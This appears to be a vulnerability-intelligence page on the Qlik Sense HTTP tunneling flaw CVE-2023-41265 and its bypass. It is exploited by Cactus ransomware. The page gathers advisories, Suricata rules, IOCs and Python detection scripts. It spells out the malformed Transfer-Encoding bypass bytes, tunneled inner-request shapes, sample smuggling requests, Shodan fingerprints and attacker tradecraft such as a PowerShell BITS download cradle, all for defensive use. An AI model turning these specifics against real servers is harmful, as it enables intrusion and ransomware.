CVE-2023-41265
Published 2023-08-29
Priority: P1 98 · Critical 9.9 (CVSS 3.1)
Vector: AV:N / AC:L / PR:L / UI:N / S:C / C:H / I:H / A:H
Tags: KEV · ITW · Exploit · Ransomware · Initial access
CISA Known Exploited Vulnerability, remediation due 2023-12-28
Exploited in the wild
EPSS: 84.97% (99.7th percentile)
An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows a remote attacker to elevate their privilege by tunneling HTTP requests in the raw HTTP request. This allows them to send requests that get executed by the backend server hosting the repository application. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13.
Affected
8 ranges, all for vendor qlik / product qlik_sense. The version bounds and fixed-in values of the individual ranges were not captured in this extraction; the affected and fixed releases are listed in the description above.
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| qlik | qlik_sense | — | — |
Detection & IOCs (extracted from sources)
Paths
- /resources/qmc/fonts/CVE-2023-41265.ttf
- /resources/qmc/fonts/
- /qrs/
Suricata (Emerging Threats) rules
```
alert http1 any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Qlik Sense Enterprise HTTP Request Tunneling Attempt (CVE-2023-48365)"; flow:established,to_server; content:"POST /qrs/"; pcre:"/^(?:ExternalProgramTask\x2fcreate|user)/R"; content:"|3f|xrfkey|3d|"; within:50; content:"X-Qlik-xrfkey|3a 20|"; nocase; distance:0; content:"X-Qlik-user|3a 20|"; distance:0; nocase; http.method; content:"HEAD"; http.cookie; content:"X-Qlik-Session|3d|"; http.header_names; content:"|0d 0a|X-Qlik-Xrfkey|0d 0a|"; fast_pattern; http.header; content:"Transfer-Encoding|3a 20 2c 09|chunked|2c 0d 0a|"; reference:url,www.praetorian.com/blog/doubleqlik-bypassing-the-original-fix-for-cve-2023-41265/; reference:cve,2023-48365; classtype:attempted-admin; sid:2059793; rev:1;)
```
```
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET WEB_SPECIFIC_APPS Possible DoubleQlik RCE via Path Traversal (CVE-2023-41266)"; flow:established,to_server; http.method; content:"POST"; http.header; content:"X-Qlik-"; fast_pattern; http.uri.raw; content:"/resources/qmc/fonts/"; startswith; content:".ttf"; endswith; reference:url,praetorian.com/blog/doubleqlik-bypassing-the-original-fix-for-cve-2023-41265/; reference:cve,2023-41266; classtype:web-application-attack; sid:2048366; rev:1;)
```
```
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET WEB_SPECIFIC_APPS Possible DoubleQlik RCE via HTTP Request Tunneling Payload (CVE-2023-41265)"; flow:established,to_server; http.method; content:"POST"; http.header; content:"X-Qlik-"; fast_pattern; http.content_len; bsize:1; content:"0"; endswith; http.request_body; bsize:>0; reference:url,praetorian.com/blog/qlik-sense-technical-exploit/; reference:cve,2023-41265; reference:url,praetorian.com/blog/doubleqlik-bypassing-the-original-fix-for-cve-2023-41265/; classtype:web-application-attack; sid:2048365; rev:3;)
```
Bytes
- Transfer-Encoding: ,\x09chunked
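The rule logic above, re-expressed in Python as an added example (this is not Qlik's code and not the Emerging Threats rules themselves) so it can be run over raw requests pulled from a proxy log or a PCAP extract. It covers sid 2048365 (Content-Length 0 with a body), sid 2048367 and 2059793 (malformed Transfer-Encoding), sid 2059793 (outer HEAD carrying a tunneled POST /qrs/ request) and sid 2048366 (POST to /resources/qmc/fonts/*.ttf). The sample requests are constructed and carry placeholder values; the token-character test for Transfer-Encoding is a generalization of the literal ',\tchunked,' byte match, not something the rules do.

```python
"""Python re-expression of the tunneling and traversal indicators that the ET
Suricata rules quoted above key on.

Added example: not Qlik's code and not the Emerging Threats rules themselves.
The sample requests at the bottom are constructed to exercise each check; they
are not captured traffic and carry no working payload.
"""
import re

# Inner request line that sid:2059793 looks for in the raw payload
INNER_QRS = re.compile(rb"POST /qrs/(?:ExternalProgramTask/create|user)\?xrfkey=")
# RFC 9110 token characters; a Transfer-Encoding list element made of anything else is malformed
TOKEN = re.compile(rb"[A-Za-z0-9!#$%&'*+.^_`|~-]+")
# Request-target shape from sid:2048366
FONT_TRAVERSAL = re.compile(rb"^/resources/qmc/fonts/.*\.ttf$", re.I)


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, target, headers, body).
    Header names are lowercased; a repeated header keeps every value."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return method, target, headers, body


def malformed_transfer_encoding(value: bytes) -> bool:
    """True for values such as b',\\tchunked,' (sid:2059793): the comma-separated
    list has an empty element or one that is not a plain token."""
    return any(not TOKEN.fullmatch(el.strip()) for el in value.split(b","))


def tunneling_indicators(raw: bytes) -> list:
    """Return the labels of every check that fires on one raw request."""
    method, target, headers, body = parse_request(raw)
    has_qlik_header = any(name.startswith(b"x-qlik-") for name in headers)
    cookie = b";".join(headers.get(b"cookie", []))
    hits = []

    # sid:2048365 - POST with an X-Qlik-* header, Content-Length exactly "0", yet a body
    if method == b"POST" and has_qlik_header and headers.get(b"content-length") == [b"0"] and body:
        hits.append("cl0-with-body")

    # sid:2048367 / sid:2059793 - Transfer-Encoding that is not a clean token list
    if any(malformed_transfer_encoding(v) for v in headers.get(b"transfer-encoding", [])):
        hits.append("malformed-transfer-encoding")

    # sid:2059793 - outer HEAD with an X-Qlik-Session cookie whose payload carries a
    # tunneled POST /qrs/... request that itself has X-Qlik-xrfkey and X-Qlik-user headers
    lowered = body.lower()
    if (method == b"HEAD" and b"X-Qlik-Session=" in cookie and INNER_QRS.search(body)
            and b"x-qlik-xrfkey:" in lowered and b"x-qlik-user:" in lowered):
        hits.append("tunneled-qrs-request")

    # sid:2048366 - POST to /resources/qmc/fonts/<name>.ttf with an X-Qlik-* header
    if method == b"POST" and has_qlik_header and FONT_TRAVERSAL.match(target):
        hits.append("font-path-traversal")
    return hits


# Constructed samples (not captured traffic). The tunneled body in SAMPLE_TUNNEL is
# not chunk-framed and carries placeholder values, so it is not replayable as an exploit.
SAMPLE_BENIGN = b"GET /hub/ HTTP/1.1\r\nHost: qlik.example\r\nCookie: X-Qlik-Session=abc\r\n\r\n"
SAMPLE_CL0 = (
    b"POST /resources/qmc/fonts/probe.ttf HTTP/1.1\r\nHost: qlik.example\r\n"
    b"X-Qlik-Xrfkey: 0123456789abcdef\r\nContent-Length: 0\r\n"
    b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\n"
)
SAMPLE_TUNNEL = (
    b"HEAD /hub/ HTTP/1.1\r\nHost: qlik.example\r\nCookie: X-Qlik-Session=abc\r\n"
    b"X-Qlik-Xrfkey: 0123456789abcdef\r\nTransfer-Encoding: ,\tchunked,\r\n\r\n"
    b"POST /qrs/user?xrfkey=0123456789abcdef HTTP/1.1\r\n"
    b"X-Qlik-Xrfkey: 0123456789abcdef\r\nX-Qlik-User: placeholder\r\n\r\n"
)

if __name__ == "__main__":
    for label, sample in [("benign", SAMPLE_BENIGN), ("cl0", SAMPLE_CL0), ("tunnel", SAMPLE_TUNNEL)]:
        print(label, tunneling_indicators(sample))
```

Run as a script it prints the labels per sample; tunneling_indicators() returns the list so the same checks can sit in a log pipeline. Like the ET rules, it only sees cleartext, so in front of a TLS-terminating Qlik proxy it has to run on decrypted traffic.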
- HTTP Request Tunneling exploit (ET sid 2048365): a POST request with an 'X-Qlik-' header present, a Content-Length header whose value is exactly the single byte '0', and yet a non-empty request body, which indicates a smuggled/tunneled inner request.
- Tunneling bypass (CVE-2023-48365 / DoubleQlik, ET sid 2059793): a malformed Transfer-Encoding value ',\x09chunked,' (comma and tab before 'chunked', trailing comma) that evades the original patch. ET sid 2048367 catches the same class generically through Suricata's http.invalid_transfer_encoding_value_in_request event combined with an 'X-Qlik-Session' cookie.
- ET sid 2059793 matches an outer HEAD request carrying an 'X-Qlik-Session' cookie whose raw payload contains the tunneled inner request: 'POST /qrs/ExternalProgramTask/create?xrfkey=' or 'POST /qrs/user?xrfkey=' followed by 'X-Qlik-xrfkey' and 'X-Qlik-user' headers. The inner request, not the outer one, is the POST to /qrs/.
- Path traversal component of the chained attack (CVE-2023-41266, ET sid 2048366): POST requests to /resources/qmc/fonts/*.ttf URIs with 'X-Qlik-' headers; discovery command output is redirected into .TTF files.
- Post-exploitation: attackers use BITS (Background Intelligent Transfer Service) and PowerShell to download tools; rclone is disguised as svchost.exe for data exfiltration; Plink is renamed to putty.exe for RDP tunneling.
- Shodan/FOFA fingerprinting: Qlik Sense instances can be identified by favicon hash -74348711, HTML containing 'Qlik', or title 'qlik-sense'.
- Nuclei probe: expects an HTTP 400 response with a Set-Cookie header containing 'x-qlik-session' and 'Bad Request' in the response headers as confirmation of vulnerable tunneling behavior.
- Cactus ransomware uses ManageEngine UEMS executables disguised as Qlik files for persistence after exploiting CVE-2023-41265.
- Attackers uninstall Sophos antivirus and change the administrator password as defense evasion steps following initial exploitation.
Caveats:
- The Suricata rule for CVE-2023-48365 (sid 2059793) requires TLS decryption (rule metadata: tls_state TLSDecrypt / deployment SSLDecrypt) to be effective where traffic is encrypted.
- The Nuclei template uses 'unsafe: true' mode to send a raw HTTP/1.1 request with both Content-Length and Transfer-Encoding headers at once, which standard HTTP clients would reject; make sure the scanner supports unsafe raw request mode.
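The post-exploitation notes above (BITS/PowerShell downloads, rclone as svchost.exe, Plink as putty.exe) turned into a process-telemetry hunt, as an added example that is not Arctic Wolf's, Qlik's or any vendor's code. It assumes Sysmon Event ID 1 style records with Image, OriginalFileName and CommandLine fields; the records are constructed, and the OriginalFileName values assumed for rclone ('rclone.exe') and Plink ('Plink') must be checked against real samples before the masquerade rule is relied on.

```python
"""Hunt over process-creation telemetry for the post-exploitation tradecraft
the notes above attribute to the Cactus intrusions: tooling fetched with BITS
or PowerShell, rclone running as svchost.exe, Plink running as putty.exe.

Added example, not Arctic Wolf's, Qlik's or any vendor's code. EVENTS holds
constructed Sysmon Event ID 1 style records, not real telemetry, and the
OriginalFileName values assumed for rclone and Plink are assumptions.
"""
import re
from pathlib import PureWindowsPath

# Embedded (PE version-resource) names that have no business running under another file name
MASQUERADE_STEMS = {"rclone", "plink"}
# svchost.exe is legitimate only from the Windows system directories
SYSTEM_DIRS = ("\\system32", "\\syswow64")
# BITS / PowerShell download cradles
DOWNLOAD_CRADLE = re.compile(
    r"bitsadmin(\.exe)?\s+/transfer|Start-BitsTransfer|Invoke-WebRequest|DownloadFile|DownloadString",
    re.I,
)


def hunt(event: dict) -> list:
    """Return the finding labels for one process-creation record."""
    image = PureWindowsPath(event["Image"])
    image_stem = image.stem.lower()
    original_stem = PureWindowsPath(event.get("OriginalFileName", "")).stem.lower()
    findings = []

    # 1. Embedded name says rclone/plink but the file on disk is called something else
    if original_stem in MASQUERADE_STEMS and original_stem != image_stem:
        findings.append(f"masquerade:{original_stem}-as-{image_stem}")

    # 2. svchost.exe launched from outside System32/SysWOW64
    if image_stem == "svchost" and not str(image.parent).lower().endswith(SYSTEM_DIRS):
        findings.append("svchost-outside-system-dir")

    # 3. BITS or PowerShell download cradle on the command line
    if DOWNLOAD_CRADLE.search(event.get("CommandLine", "")):
        findings.append("download-cradle")
    return findings


def hunt_all(events: list) -> dict:
    """Map each record's ProcessId to its findings, dropping clean records."""
    return {e["ProcessId"]: hits for e in events if (hits := hunt(e))}


# Constructed records (not real telemetry); command-line arguments are placeholders
EVENTS = [
    {"ProcessId": 100, "Image": r"C:\Windows\System32\svchost.exe",
     "OriginalFileName": "svchost.exe", "CommandLine": "svchost.exe -k netsvcs"},
    {"ProcessId": 200, "Image": r"C:\ProgramData\svchost.exe",
     "OriginalFileName": "rclone.exe", "CommandLine": "svchost.exe copy C:\\Shares remote:"},
    {"ProcessId": 300, "Image": r"C:\Users\Public\putty.exe",
     "OriginalFileName": "Plink", "CommandLine": "putty.exe -N -R <placeholder>"},
    {"ProcessId": 400, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell -c Start-BitsTransfer -Source http://example.invalid/t.zip "
                    "-Destination C:\\ProgramData\\t.zip"},
]

if __name__ == "__main__":
    for pid, hits in hunt_all(EVENTS).items():
        print(pid, hits)
```

The masquerade check is the durable one: renaming a binary does not change the OriginalFileName the loader reports, so it catches the next rename as well as svchost.exe and putty.exe. The cradle regex is deliberately narrow to the techniques named on this page and should be widened with your own telemetry.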
CVSS provenance
- NVD (v3.1): 9.9 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
- VulnCheck: 9.6 CRITICAL
- CISA: 9.9 CRITICAL
GHSA
GHSA-2cxf-f44j-gqqf (CVE-2023-48365, CRITICAL, CWE-444) · ghsa_unreviewed · 2023-11-16 · CVSS 9.6
Qlik Sense Enterprise for Windows before August 2023 Patch 2 allows unauthenticated remote code execution, aka QB-21683. Due to improper validation of HTTP headers, a remote attacker is able to elevate their privilege by tunneling HTTP requests, allowing them to execute HTTP requests on the backend server that hosts the repository application. The fixed versions are August 2023 Patch 2, May 2023 Patch 6, February 2023 Patch 10, November 2022 Patch 12, August 2022 Patch 14, May 2022 Patch 16, February 2022 Patch 15, and November 2021 Patch 17. NOTE: this issue exists because of an incomplete fix for CVE-2023-41265.
GHSA
GHSA-h5r5-8fxj-m5cm (CVE-2023-41265, CRITICAL, CWE-444) · ghsa_unreviewed · 2023-08-30
Description: same text as the CVE description above.
VulnCheck
Qlik Sense HTTP Tunneling Vulnerability (CVE-2023-41265, CRITICAL, CWE-444) · vulncheck · 2023 · CVSS 9.6
Qlik Sense contains an HTTP tunneling vulnerability that allows an attacker to escalate privileges and execute HTTP requests on the backend server hosting the software.
Affected: Qlik Sense
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References:
- https://www.arcticwolf.com/resources/blog/qlik-sense-exploited-in-cactus-ransomware-campaign/
- https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2023-41265
- https://dashboard.shadowserver.org
CISA
Qlik Sense HTTP Tunneling Vulnerability (CVE-2023-41265, CRITICAL, CWE-444) · cisa · 2023-12-07 · CVSS 9.9
Qlik Sense contains an HTTP tunneling vulnerability that allows an attacker to escalate privileges and execute HTTP requests on the backend server hosting the software.
Affected: Qlik Sense
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Notes:
- https://community.qlik.com/t5/Official-Support-Articles/Critical-Security-fixes-for-Qlik-Sense-Enterprise-for-Windows/ta-p/2110801
- https://nvd.nist.gov/vuln/detail/CVE-2023-41265
Remediation Due Date: 2023-12-28
Suricata
ET WEB_SPECIFIC_APPS Qlik Sense Enterprise HTTP Request Tunneling Attempt (CVE-2023-48365) · suricata · 2025-01-31 · CVSS 9.6 · CVE-2023-48365 [CRITICAL]
Rule (cut off in this extraction; the complete rule, sid 2059793, is quoted in the Detection & IOCs section above):
```
alert http1 any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Qlik Sense Enterprise HTTP Request Tunneling Attempt (CVE-2023-48365)"; flow:established,to_server; content:"POST /qrs/"; pcre:"/^(?:ExternalProgramTask\x2fcreate|user)/R"; content:"|3f|xrfkey|3d|"; within:50; content:"X-Qlik-xrfkey|3a 20|"; nocase; distance:0; content:"X-Qlik-user|3a 20|"; distance:0; nocase; http.method; content:"HEAD"; http.cookie; content:"X-Qlik-Session|3d|"; http.header_names; content:"|0d 0a|X-Qlik-Xrfkey|0d 0a|"; fast_pattern; http.header; content:"Transfer-Encoding|3a 20 2c 09|chunked|2c 0d 0a|"; reference:url,www.praetorian.com/blog/doubleqlik-bypassing-the-original-fix-for-cve-2023-41265/; reference:cve
```
Suricata
ET WEB_SPECIFIC_APPS Possible DoubleQlik RCE via Path Traversal (CVE-2023-41266) · suricata · 2023-09-29 · CVSS 8.2 · CVE-2023-41266 [HIGH]
Rule (cut off in this extraction):
```
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET WEB_SPECIFIC_APPS Possible DoubleQlik RCE via Path Traversal (CVE-2023-41266)"; flow:established,to_server; http.method; content:"POST"; http.header; content:"X-Qlik-"; fast_pattern; http.uri.raw; content:"/resources/qmc/fonts/"; startswith; content:".ttf"; endswith; reference:url,praetorian.com/blog/doubleqlik-bypassing-the-original-fix-for-cve-2023-41265/; reference:cve,2023-41266; classtype:web-application-attack; sid:2048366; rev:1; metadata:affected_product Qlik_Sense_Enterprise, created_at 2023_09_29, cve CVE_2023_41266, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generate
```
Suricata
ET WEB_SPECIFIC_APPS Possible DoubleQlik RCE via HTTP Request Tunneling Payload (CVE-2023-41265) · suricata · 2023-09-29 · CVSS 9.6 · CVE-2023-41265 [CRITICAL]
Rule (cut off in this extraction):
```
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET WEB_SPECIFIC_APPS Possible DoubleQlik RCE via HTTP Request Tunneling Payload (CVE-2023-41265)"; flow:established,to_server; http.method; content:"POST"; http.header; content:"X-Qlik-"; fast_pattern; http.content_len; bsize:1; content:"0"; endswith; http.request_body; bsize:>0; reference:url,praetorian.com/blog/qlik-sense-technical-exploit/; reference:cve,2023-41265; reference:url,praetorian.com/blog/doubleqlik-bypassing-the-original-fix-for-cve-2023-41265/; classtype:web-application-attack; sid:2048365; rev:3; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, affected_product Qlik_Sense_Enterprise, attack_target Cli
```
Suricata
ET WEB_SPECIFIC_APPS Possible DoubleQlik RCE via HTTP Request Tunneling with Malformed Transfer-Encoding (CVE-2023-41265) · suricata · 2023-09-29 · CVSS 9.6 · CVE-2023-41265 [CRITICAL]
Rule (cut off in this extraction):
```
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET WEB_SPECIFIC_APPS Possible DoubleQlik RCE via HTTP Request Tunneling with Malformed Transfer-Encoding (CVE-2023-41265)"; flow:established,to_server; app-layer-event:http.invalid_transfer_encoding_value_in_request; http.cookie; content:"X-Qlik-Session="; fast_pattern; reference:url,praetorian.com/blog/doubleqlik-bypassing-the-original-fix-for-cve-2023-41265/; reference:cve,2023-41265; classtype:web-application-attack; sid:2048367; rev:1; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, affected_product Qlik_Sense_Enterprise, attack_target Client_Endpoint, created_at 2023_09_29, cve CVE_2023_
```
Nuclei
Qlik Sense Enterprise - HTTP Request Smuggling (CVE-2023-41265, CRITICAL) · nuclei · CVSS 9.9
Description: same text as the CVE description above.
Template (cut off in this extraction):
```yaml
id: CVE-2023-41265

info:
  name: Qlik Sense Enterprise - HTTP Request Smuggling
  author: AdamCrosser
  severity: critical
  description: |
    An HTTP Request Tunneling vulnerabi
```
BleepingComputer
Magnet Goblin hackers use 1-day flaws to drop custom Linux malware · blogs_bleepingcomputer · 2024-03-09 · CVSS 9.8 [CRITICAL]
## Magnet Goblin hackers use 1-day flaws to drop custom Linux malware
By Bill Toulas
A financially motivated hacking group named Magnet Goblin uses various 1-day vulnerabilities to breach public-facing servers and deploy custom malware on Windows and Linux systems.
1-day flaws refer to publicly disclosed vulnerabilities for which a patch has been released. Threat actors looking to exploit these flaws must do so quickly before a target can apply security updates.
Though exploits are usually not made available immediately upon a flaw's disclosure, some vulnerabilities are trivial to figure out how to leverage. Additionally, reverse-engineering the patch may reveal the underlying problem and how to exploit it.
Check Point analysts who identified Magnet Goblin report that these threat act
Check Point Research
Magnet Goblin Targets Publicly Facing Servers Using 1-Day Vulnerabilities · blogs_checkpoint · 2024-03-08 · CVSS 4.9 · CVE-2024-21887 [MEDIUM]
## Magnet Goblin Targets Publicly Facing Servers Using 1-Day Vulnerabilities
## Key Points
Magnet Goblin is a financially motivated threat actor that quickly adopts and leverages 1-day vuln
BleepingComputer
Cactus ransomware exploiting Qlik Sense flaws to breach networks · blogs_bleepingcomputer · 2023-11-30 · CVSS 9.6 [CRITICAL]
## Cactus ransomware exploiting Qlik Sense flaws to breach networks
By Bill Toulas
Cactus ransomware has been exploiting critical vulnerabilities in the Qlik Sense data analytics solution to get initial access on corporate networks.
Qlik Sense supports multiple data sources and allows users to create custom data reports or interactive visualizations that can serve in decision making processes. The product can work both locally or in the cloud.
In late August, the vendor released security updates for two critical vulnerabilities affecting the Windows version of the platform. One of the vulnerabilities, a path traversal bug tracked as CVE-2023-41266, could be exploited to generate anonymous sessions and perform HTTP requests to unauthorized endpoints.
The second issue, tracked as CVE-2
References
- https://community.qlik.com/t5/Official-Support-Articles/Critical-Security-fixes-for-Qlik-Sense-Enterprise-for-Windows/ta-p/2110801
- https://community.qlik.com/t5/Release-Notes/tkb-p/ReleaseNotes
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-41265
Timeline
- 2023-08-29: Published
- 2023-12-07: Added to CISA KEV
- Exploited in the wild